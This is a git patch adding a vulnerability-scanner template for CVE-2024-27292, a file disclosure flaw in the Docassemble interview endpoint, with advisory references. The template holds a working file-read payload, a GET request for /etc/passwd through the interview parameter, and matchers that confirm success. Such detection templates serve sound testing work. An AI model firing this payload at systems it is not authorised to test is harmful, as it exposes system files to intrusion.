From b8f580fb6795b37d130d30150266598404451fcf Mon Sep 17 00:00:00 2001
From: johnk3r <johnatan2camargo@gmail.com>
Date: Mon, 1 Jul 2024 12:24:38 -0300
Subject: [PATCH] Create CVE-2024-27292.yaml

---
 http/cves/2024/CVE-2024-27292.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-27292.yaml

diff --git a/http/cves/2024/CVE-2024-27292.yaml b/http/cves/2024/CVE-2024-27292.yaml
new file mode 100644
index 0000000000..4f87baa0e4
--- /dev/null
+++ b/http/cves/2024/CVE-2024-27292.yaml
@@ -0,0 +1,28 @@
+id: CVE-2024-27292
+
+info:
+  name: Sensitive File Disclosure via Interview Endpoint
+  author: johnk3r
+  severity: high
+  description: Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
+  reference:
+    - https://tantosec.com/blog/docassemble/
+    - https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
+  tags: lfi,docassemble,cve,cve2024
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/interview?i=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "nobody:[x*]:65534:65534"
+          - "root:.*:0:0:"
+        condition: or
+
+      - type: status
+        status:
+          - 501